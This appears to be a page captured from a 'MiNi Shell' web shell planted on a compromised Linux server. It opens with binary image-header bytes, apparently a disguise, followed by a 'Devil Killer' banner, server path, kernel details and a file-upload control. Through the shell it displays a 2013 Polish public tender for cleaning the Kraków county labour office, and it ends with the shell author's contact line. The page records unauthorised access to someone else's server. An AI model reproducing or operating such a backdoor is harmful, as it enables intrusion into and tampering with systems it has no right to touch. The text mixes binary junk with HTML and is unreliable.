JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131213/519650-N-2013.html

<p class="kh_header"><b>Kraków: postępowanie o udzielenie zamówienia publicznego
na usługę sprzątania obiektów użyteczności publicznej na rzecz Urzędu Pracy Powiatu Krakowskiego znak sprawy: ZP.271.42.2013</b><br>
<b>Numer ogłoszenia: 519650 - 2013; data zamieszczenia: 13.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Pracy Powiatu Krakowskiego , ul. Mazowiecka 21, 30-019 Kraków, woj. małopolskie, tel. 12 2997425, 12 6237480, faks 12 6325215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uppk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> postępowanie o udzielenie zamówienia publicznego
na usługę sprzątania obiektów użyteczności publicznej na rzecz Urzędu Pracy Powiatu Krakowskiego znak sprawy: ZP.271.42.2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający nie dopuszcza możliwości składania ofert częściowych.
Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających na podstawie art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, które polegać będą na powtórzeniu tego samego rodzaju zamówienia co zamówienie  podstawowe i nie przekroczą 30% wartość zamówienia podstawowego.
1.	 Usługi będą realizowane w następujących lokalizacjach:
a)	Kraków, ul. Mazowiecka 21 - powierzchnia 891,2 m2 + 2 klatki schodowe prowadzące z IX na X piętro;
b)	Skawina, ul. Ogrody 17 - powierzchnia 239,64 m2;
c)	Słomniki, ul. Kościuszki 64 - powierzchnia 248,63 m2.

2.	Opis czynności, które należy wykonać w obrębie każdej z lokalizacji:
A.	Kraków, ul. Mazowiecka 21 - sprzątanie pomieszczeń biurowych i innych pomieszczeń użytkowych jak toalety i pokój socjalny w zakresie: 
a)	odkurzania wykładzin dywanowych; 
b)	zamiatania i mycia podłóg (posadzki oraz wykładzina typu market); 
c)	usuwania kurzu z mebli, sprzętu biurowego,  elementów zawieszonych na ścianach; 
d)	przemywanie luster, drzwi;
e)	mycie kuchenki mikrofalowej oraz lodówki wraz z jej uprzednim rozmrożeniem; 
f)	mycie i dezynfekcja umywalek, muszli klozetowych i desek sedesowych, ścian wokół umywalek oraz muszli klozetowych, armatury;
g)	mycie okien PCV oraz innych powierzchni przeszklonych;
h)	opróżnianie koszy na śmieci wraz z wymianą worka;
i)	uzupełnianie mydła w dozownikach, a także papieru toaletowego i ręczników papierowych (ręczniki muszą być w rolkach);
j)	czyszczenie tapicerki krzeseł i foteli oraz czyszczenie wykładziny dywanowej 
o powierzchni 414,70 metra kwadratowego 1 raz w roku, w terminie ustalonym przez Zamawiającego i Wykonawcę;
k)	dodatkowo Wykonawca zaopatrzy Zamawiającego w odświeżacz powietrza 
w sprayu o zapachu kwiatowym w ilości jednego opakowania o pojemności 300 ml raz na dwa tygodnie, a także preparat myjący do zmywarek w postaci proszku lub kostek w ilości 1 kg na miesiąc oraz preparat czyszczący/odkamieniacz do ekspresu do kawy w ilości 1 opakowania (zawierającego min. 6 sztuk tabletek) na miesiąc.
B.	Skawina, ul. Ogrody 17 - sprzątanie pomieszczeń biurowych i innych pomieszczeń użytkowych jak toalety i pokój socjalny w zakresie: 
a)	odkurzania wykładzin dywanowych; 
b)	zamiatania i mycia podłóg (posadzki oraz wykładzina PCV);  
c)	usuwania kurzu z mebli, sprzętu biurowego,  elementów zawieszonych na ścianach;  
d)	przemywanie luster, drzwi;
e)	mycie kuchenki mikrofalowej oraz lodówki wraz z jej uprzednim rozmrożeniem; 
f)	mycie i dezynfekcja umywalek, muszli klozetowych i desek sedesowych, ścian wokół umywalek oraz muszli klozetowych, armatury;
g)	mycie okien PCV oraz innych powierzchni przeszklonych;
h)	mycie wejściowych schodów zewnętrznych, a także w okresie zimowym 
ich odśnieżanie i posypywanie piaskiem; 
i)	opróżnianie koszy na śmieci wraz z wymianą worka;
j)	uzupełnianie mydła w dozownikach, a także papieru toaletowego i ręczników papierowych;
k)	czyszczenie tapicerki krzeseł i foteli oraz czyszczenie wykładziny dywanowej 
o powierzchni 40 metrów kwadratowych 1 raz w roku, w terminie ustalonym przez Stronę i Ponoszącego wydatek.
C.	Słomniki, ul. Kościuszki 64 - sprzątanie pomieszczeń biurowych i innych pomieszczeń użytkowych jak toalety i pokój socjalny w zakresie: 
a)	zamiatania i mycia podłóg (posadzki oraz wykładzina PCV);  
b)	usuwania kurzu z mebli, sprzętu biurowego,  elementów zawieszonych na ścianach;  
c)	przemywanie luster, drzwi;
d)	mycie kuchenki mikrofalowej oraz lodówki wraz z jej uprzednim rozmrożeniem; 
e)	mycie i dezynfekcja umywalek, muszli klozetowych i desek sedesowych, ścian wokół umywalek oraz muszli klozetowych, armatury;
f)	mycie okien PCV oraz innych powierzchni przeszklonych;
g)	opróżnianie koszy na śmieci wraz z wymianą worka;
h)	uzupełnianie mydła w dozownikach, a także papieru toaletowego i ręczników papierowych;
i)	mycie wejściowych schodów zewnętrznych, a także w okresie zimowym 
ich odśnieżanie i posypywanie piaskiem;
j)	czyszczenie tapicerki krzeseł i foteli 1 raz w roku, w terminie ustalonym przez Stronę i Ponoszącego wydatek.
3.  Pozostałe informacje:
a)	Zamawiający oczekuje, że każda z osób wyznaczonych przez Wykonawcę do  wykonywania usługi, zostanie na czas realizacji Umowy przypisana do wykonywania prac w określonej lokalizacji Zamawiającego. Oznacza to, że osoba A będzie odpowiedzialna za realizację Umowy 
w lokalizacji Skawina, ul. Ogrody 17, osoba B w lokalizacji  Słomniki, ul. Kościuszki 64 oraz osoby C i D w lokalizacji Kraków, ul. Mazowiecka 21.
b)	Nazwiska osób, które Wykonawca wskaże do realizacji usługi zostaną podane do wiadomości Zamawiającego w formie pisemnej w dniu zawierania umowy.
c)	Zamawiający dopuszcza możliwość zmiany osoby sprzątającej, pod warunkiem, że Wykonawca dokona pisemnego zgłoszenia z podaniem nazwiska osoby przejmującej zastępstwo oraz określeniem terminu na jaki zastępstwo zostało wprowadzone. Ponadto przedmiotowe zgłoszenie powinno zostać skierowane odpowiednio wcześniej tj. minimum z 3 dniowym wyprzedzeniem.
d)	Częstotliwość wykonywania opisanych w punkcie 2 czynności, określa zamieszczona powyżej tabela.
e)	Zamawiający zapewni w obrębie każdej lokalizacji miejsce do przechowywania sprzętu służącego do sprzątania oraz urządzeń i środków czystości.
f)	Wykonawca zapewni wszystkie niezbędne do wykonywania usługi  urządzenia i środki.
g)	W obrębie każdej lokalizacji, realizacja usług odbywać się będzie w dniach od poniedziałku 
do piątku (5 dni w tygodniu) od godziny 15:00. W sytuacjach wyjątkowych Zamawiający zastrzega sobie prawo do zmiany godziny rozpoczęcia sprzątania powierzchni biurowej na wcześniejszą, 
o czym Wykonawca zostanie powiadomiony pisemnie z trzydniowym wyprzedzeniem. Informacja zostanie Wykonawcy przesłana faxem lub drogą elektroniczną.
h)	Jakość materiałów czyszczących i higienicznych przewidzianych do realizacji usługi, nie może być niższa od średniej jakości podobnych materiałów występujących na rynku.

4. Nadzór nad realizacją Umowy.

a)	W ramach nadzoru nad realizacją przedmiotu Umowy, Zamawiający inicjował będzie kontrolę stanu czystości w obiektach objętych przedmiotową Umową.
b)	Kontrola realizowana będzie z częstotliwością co najmniej jeden raz w miesiącu, a przeprowadzać ją będą osoby wytypowane przez Zamawiającego i Wykonawcę. Każdorazowo na zakończenie kontroli sporządzony zostanie protokół, w którym wyszczególnione zostaną ewentualne niedociągnięcia i uwagi Zamawiającego. W protokole również, w razie zaistnienia takiej okoliczności, zawarta zostanie adnotacja o niewykonywaniu przez Wykonawcę którejkolwiek czynności określonej punkcie 2.
c)	 Wykonawca będzie zobligowany do usunięcia niedociągnięć wymienionych w protokole w ciągu trzech dni kalendarzowych, licząc od daty sporządzenia protokołu. W przypadku, gdy Wykonawca nie wywiąże się z powyższego terminu, skutkować on będzie obniżeniem miesięcznego wynagrodzenia Wykonawcy o 20%.
d)	 Obniżenie wynagrodzenia Wykonawcy o 20% nastąpi również w sytuacji, gdy w trzech protokołach sporządzonych po kontroli stanu czystości, stwierdzone zostanie niewykonanie przez Wykonawcę którejkolwiek czynności wyszczególnionej w niniejszym załączniku..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie formułuje szczegółowego warunku w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek określony w pkt V.b) SIWZ został spełniony w sytuacji, gdy Wykonawca wykaże w Wykazie zrealizowanych lub realizowanych głównych usług stanowiącym załącznik nr 6 do SIWZ, że zrealizował lub realizuje nadal co najmniej dwie usługi odpowiadające swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia oraz jednocześnie Wykonawca załączy dowody, czy usługi wykazane w Wykazie zrealizowanych lub realizowanych głównych usług zostały zrealizowane lub są realizowane należycie.

Poprzez obiekty użyteczności publicznej Zamawiający rozumie obiekty wymienione w § 3 pkt. 6 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. nr 75 poz. 690 z 2002r. ze zm.);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie formułuje szczegółowego warunku w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie formułuje szczegółowego warunku w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie formułuje szczegółowego warunku w powyższym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy - załącznik nr 1 do SIWZ;
2.	Pełnomocnictwo dla osoby podpisującej ofertę lub inny dokument, z którego wynikać będzie jej umocowanie do reprezentowania Wykonawcy w postępowaniach przetargowych, w tym podpisywania dokumentów przetargowych.
3.	Formularz dotyczący podwykonawców z określeniem ich udziału w wykonywaniu zamówienia - załącznik nr 5 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą:
a)	terminu realizacji zamówienia
b)	przemieszczenia jednej lub więcej lokalizacji, w których świadczone będą usługi
c)	ograniczenia zakresu przedmiotu zamówienia, w szczególności w przypadku powstania okoliczności powodujących, że wykonanie tego zakresu nie leży w interesie publicznym 
d)	innych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy
e)	cen świadczonych usług w przypadku zmiany obowiązujących przepisów prawa. 
Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pupf.krakow.sisco.info/?id=502<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Pracy Powiatu Krakowskiego
Ul. Mazowiecka 21
30 - 019 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2013 godzina 09:00, miejsce: Urząd Pracy Powiatu Krakowskiego
Ul. Mazowiecka 21
30 - 019 Kraków
stanowisko dziennika podawczego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com